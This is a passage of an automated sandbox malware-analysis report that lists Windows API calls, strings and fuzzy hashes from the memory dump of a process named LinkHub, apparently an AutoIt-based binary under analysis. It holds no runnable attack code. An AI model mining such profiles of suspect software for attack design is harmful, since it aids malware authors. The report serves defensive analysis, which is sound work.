                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 642191829-3771769585
                                                                    • Opcode ID: efcf3e57fe8795a0b0ceddba2379e65423f1634d48f7578780cc996a38726ff3
                                                                    • Instruction ID: 9e5fc84ae898481d23068479482149a71056144f90945b30e4fb427078ffaf5e
                                                                    • Opcode Fuzzy Hash: efcf3e57fe8795a0b0ceddba2379e65423f1634d48f7578780cc996a38726ff3
                                                                    • Instruction Fuzzy Hash: 6711B4719042157FDB247B64DC4AEEE77ACEF41710F0100A6F619EA191EF748A81D760
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$LocalTime
                                                                    • String ID:
                                                                    • API String ID: 952045576-0
                                                                    • Opcode ID: 236148841ea5520b49786118967f02c95a807d6209a40bd1620a708359dbe727
                                                                    • Instruction ID: df2021b330e6a81c9feaf7b0116869a047ee05b1f34a4052aee16056a72e370d
                                                                    • Opcode Fuzzy Hash: 236148841ea5520b49786118967f02c95a807d6209a40bd1620a708359dbe727
                                                                    • Instruction Fuzzy Hash: 4A419465C11214B9CF11EBB8CC8AECFB7A8AF05310F518466F619E3261FA34D256C3A6
                                                                    APIs
                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00CB39E2,00000004,00000000,00000000), ref: 00C8FC41
                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00CB39E2,00000004,00000000,00000000), ref: 00CCFC15
                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00CB39E2,00000004,00000000,00000000), ref: 00CCFC98
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: 92963d53af859a26ba251bd88357881c8a46f179b2e86693aa0b3d5263a50aed
                                                                    • Instruction ID: 3591c2e92612c72209edbc0aba0fcb85e8e8964130bf36462abf33e581c77d23
                                                                    • Opcode Fuzzy Hash: 92963d53af859a26ba251bd88357881c8a46f179b2e86693aa0b3d5263a50aed
                                                                    • Instruction Fuzzy Hash: 5741EB3060838C9BC735AB3DC998B7A7F92BB4B314F14453DE95B86A60C631AB42D725
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00D037B7
                                                                    • GetDC.USER32(00000000), ref: 00D037BF
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D037CA
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00D037D6
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00D03812
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00D03823
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00D06504,?,?,000000FF,00000000,?,000000FF,?), ref: 00D0385E
                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00D0387D
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 3864802216-0
                                                                    • Opcode ID: b1cc4faaf2b2f4790fb9054288aa2aa6c59ba45b460cd591e7a3944b08573225
                                                                    • Instruction ID: 3a105abe81ffc51efd9bb238ff8983aef60ef848b62f8be1fa2c15f6d6fe3787
                                                                    • Opcode Fuzzy Hash: b1cc4faaf2b2f4790fb9054288aa2aa6c59ba45b460cd591e7a3944b08573225
                                                                    • Instruction Fuzzy Hash: 48317C76201214ABEB158F909C89FEB3BAEEB49711F044066FE0DDA291C6B59851C7B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                    • API String ID: 0-572801152
                                                                    • Opcode ID: 329363c79bfbbdad5dc17685c1d68dac382c59af105c0cab197211a113bd214f
                                                                    • Instruction ID: f9743220ef9329dd4cf45b5c8f7b5a2ef363fbd43f12d623950db5e1f6efae1d
                                                                    • Opcode Fuzzy Hash: 329363c79bfbbdad5dc17685c1d68dac382c59af105c0cab197211a113bd214f
                                                                    • Instruction Fuzzy Hash: 4AD18E71A0060AAFDB50CFA8C885BBEB7B5FF48304F158169EB15AB281D770DE45CB61
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00CB1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00CB194E
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00CB1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00CB19D1
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00CB1B7B,?,00CB1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00CB1A64
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00CB1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00CB1A7B
                                                                      • Part of subcall function 00CA3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA3BC5
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00CB1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00CB1AF7
                                                                    • __freea.LIBCMT ref: 00CB1B22
                                                                    • __freea.LIBCMT ref: 00CB1B2E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                    • String ID:
                                                                    • API String ID: 2829977744-0
                                                                    • Opcode ID: c576adf3ea25159d8ba2cc92eb3e7e45df6d96ae137900f08fcf8486fb4c1adc
                                                                    • Instruction ID: 2539a70682fd6b57ed6ff6db6d5e9da8e8c992d28aa249f9b1df2edf022d13c0
                                                                    • Opcode Fuzzy Hash: c576adf3ea25159d8ba2cc92eb3e7e45df6d96ae137900f08fcf8486fb4c1adc
                                                                    • Instruction Fuzzy Hash: E291C572E002569BDF208FA5D8A1AEE7BB5EF09710F5C0529EC25E7280E735DE40D760
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit
                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                    • API String ID: 2610073882-625585964
                                                                    • Opcode ID: c0c6434e676ab05c11be32f95212b3f5c430f08afff767775493421ea16d18b1
                                                                    • Instruction ID: 6208edaa93299917ceb7cca8c68b7fcebb179d2dcde63142b1b6453a828812a2
                                                                    • Opcode Fuzzy Hash: c0c6434e676ab05c11be32f95212b3f5c430f08afff767775493421ea16d18b1
                                                                    • Instruction Fuzzy Hash: D891A171A00619ABDF60CFA5C848FAEBBB8EF45314F108559F715AB280D770AA45CFA1
                                                                    APIs
                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00CE1C1B
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00CE1C43
                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00CE1C67
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00CE1C97
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00CE1D1E
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00CE1D83
                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00CE1DEF
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                    • String ID:
                                                                    • API String ID: 2550207440-0
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00CF43C8
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00CF44D7
                                                                    • _wcslen.LIBCMT ref: 00CF44E7
                                                                    • VariantClear.OLEAUT32(?), ref: 00CF467C
                                                                      • Part of subcall function 00CE169E: VariantInit.OLEAUT32(00000000), ref: 00CE16DE
                                                                      • Part of subcall function 00CE169E: VariantCopy.OLEAUT32(?,?), ref: 00CE16E7
                                                                      • Part of subcall function 00CE169E: VariantClear.OLEAUT32(?), ref: 00CE16F3
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                    • API String ID: 4137639002-1221869570
                                                                    APIs
                                                                      • Part of subcall function 00CD08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?,?,?,00CD0C4E), ref: 00CD091B
                                                                      • Part of subcall function 00CD08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?,?), ref: 00CD0936
                                                                      • Part of subcall function 00CD08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?,?), ref: 00CD0944
                                                                      • Part of subcall function 00CD08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CD0831,80070057,?), ref: 00CD0954
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00CF56AE
                                                                    • _wcslen.LIBCMT ref: 00CF57B6
                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00CF582C
                                                                    • CoTaskMemFree.OLE32(?), ref: 00CF5837
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                    • String ID: NULL Pointer assignment
                                                                    • API String ID: 614568839-2785691316
                                                                    APIs
                                                                    • GetMenu.USER32(?), ref: 00D02C1F
                                                                    • GetMenuItemCount.USER32(00000000), ref: 00D02C51
                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00D02C79
                                                                    • _wcslen.LIBCMT ref: 00D02CAF
                                                                    • GetMenuItemID.USER32(?,?), ref: 00D02CE9
                                                                    • GetSubMenu.USER32(?,?), ref: 00D02CF7
                                                                      • Part of subcall function 00CD4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD43AD
                                                                      • Part of subcall function 00CD4393: GetCurrentThreadId.KERNEL32 ref: 00CD43B4
                                                                      • Part of subcall function 00CD4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00CD2F00), ref: 00CD43BB
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00D02D7F
                                                                      • Part of subcall function 00CDF292: Sleep.KERNEL32 ref: 00CDF30A
                                                                    Similarity
                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                    • String ID:
                                                                    • API String ID: 4196846111-0
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 00D08992
                                                                    • IsWindowEnabled.USER32(00000000), ref: 00D0899E
                                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00D08A79
                                                                    • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00D08AAC
                                                                    • IsDlgButtonChecked.USER32(?,00000000), ref: 00D08AE4
                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 00D08B06
                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00D08B1E
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                    • String ID:
                                                                    • API String ID: 4072528602-0
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 00CDB8C0
                                                                    • GetKeyboardState.USER32(?), ref: 00CDB8D5
                                                                    • SetKeyboardState.USER32(?), ref: 00CDB936
                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00CDB964
                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00CDB983
                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00CDB9C4
                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CDB9E7
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    APIs
                                                                    • GetParent.USER32(00000000), ref: 00CDB6E0
                                                                    • GetKeyboardState.USER32(?), ref: 00CDB6F5
                                                                    • SetKeyboardState.USER32(?), ref: 00CDB756
                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CDB782
                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CDB79F
                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CDB7DE
                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CDB7FF
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00CA5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00CA57E3
                                                                    • __fassign.LIBCMT ref: 00CA585E
                                                                    • __fassign.LIBCMT ref: 00CA5879
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00CA589F
                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,00CA5F16,00000000,?,?,?,?,?,?,?,?,?,00CA5F16,?), ref: 00CA58BE
                                                                    • WriteFile.KERNEL32(?,?,00000001,00CA5F16,00000000,?,?,?,?,?,?,?,?,?,00CA5F16,?), ref: 00CA58F7
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00C930BB
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00C930C3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00C93151
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00C9317C
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00C931D1
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    APIs
                                                                      • Part of subcall function 00CF3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00CF3AD7
                                                                      • Part of subcall function 00CF3AAB: _wcslen.LIBCMT ref: 00CF3AF8
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00CF1B6F
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF1B7E
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF1C26
                                                                    • closesocket.WSOCK32(00000000), ref: 00CF1C56
                                                                    Similarity
                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 2675159561-0
                                                                    APIs
                                                                      • Part of subcall function 00CDE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CDD7CD,?), ref: 00CDE714
                                                                      • Part of subcall function 00CDE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CDD7CD,?), ref: 00CDE72D
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00CDD7F0
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00CDD82A
                                                                    • _wcslen.LIBCMT ref: 00CDD8B0
                                                                    • _wcslen.LIBCMT ref: 00CDD8C6
                                                                    • SHFileOperationW.SHELL32(?), ref: 00CDD90C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                    • String ID: \*.*
                                                                    • API String ID: 3164238972-1173974218
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D038B8
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D038EB
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D03920
                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D03952
                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D0397C
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00D0398D
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D039A7
                                                                    Similarity
                                                                    • API ID: LongWindow$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 2178440468-0
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD80D0
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD80F6
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00CD80F9
                                                                    • SysAllocString.OLEAUT32(?), ref: 00CD8117
                                                                    • SysFreeString.OLEAUT32(?), ref: 00CD8120
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00CD8145
                                                                    • SysAllocString.OLEAUT32(?), ref: 00CD8153
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD81A9
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD81CF
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00CD81D2
                                                                    • SysAllocString.OLEAUT32 ref: 00CD81F3
                                                                    • SysFreeString.OLEAUT32 ref: 00CD81FC
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00CD8216
                                                                    • SysAllocString.OLEAUT32(?), ref: 00CD8224
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00CE0E99
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CE0ED5
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CreateHandlePipe
                                                                    • String ID: nul
                                                                    • API String ID: 1424370930-2873401336
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00CE0F6D
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00CE0FA8
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CreateHandlePipe
                                                                    • String ID: nul
                                                                    • API String ID: 1424370930-2873401336
                                                                    APIs
                                                                      • Part of subcall function 00C77873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C778B1
                                                                      • Part of subcall function 00C77873: GetStockObject.GDI32(00000011), ref: 00C778C5
                                                                      • Part of subcall function 00C77873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C778CF
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00D04BB0
                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00D04BBD
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00D04BC8
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00D04BD7
                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00D04BE3
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 1025951953-3636473452
                                                                    APIs
                                                                      • Part of subcall function 00CADB23: _free.LIBCMT ref: 00CADB4C
                                                                    • _free.LIBCMT ref: 00CADBAD
                                                                      • Part of subcall function 00CA2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?), ref: 00CA2D4E
                                                                      • Part of subcall function 00CA2D38: GetLastError.KERNEL32(?,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?,?), ref: 00CA2D60
                                                                    • _free.LIBCMT ref: 00CADBB8
                                                                    • _free.LIBCMT ref: 00CADBC3
                                                                    • _free.LIBCMT ref: 00CADC17
                                                                    • _free.LIBCMT ref: 00CADC22
                                                                    • _free.LIBCMT ref: 00CADC2D
                                                                    • _free.LIBCMT ref: 00CADC38
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00CDE328
                                                                    • LoadStringW.USER32(00000000), ref: 00CDE32F
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CDE345
                                                                    • LoadStringW.USER32(00000000), ref: 00CDE34C
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CDE390
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00CDE36D
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message
                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                    • API String ID: 4072794657-3128320259
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00CE1322
                                                                    • EnterCriticalSection.KERNEL32(00000000,?), ref: 00CE1334
                                                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 00CE1342
                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00CE1350
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CE135F
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CE136F
                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 00CE1376
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    • Opcode ID: a9d273d26d105a8cbbaa8921d17260b2cca8c2d034ec188eed741921d2a68c15
                                                                    • Instruction ID: 4c752ae477af6a78fb5b58620bc74272f8ad4c64757bf0a77ce55ac04058cbc6
                                                                    • Opcode Fuzzy Hash: a9d273d26d105a8cbbaa8921d17260b2cca8c2d034ec188eed741921d2a68c15
                                                                    • Instruction Fuzzy Hash: 35F0EC32042712BBD7415BA4EE49BD6BB3AFF04302F441126F106D19B08B749571CFA5
                                                                    APIs
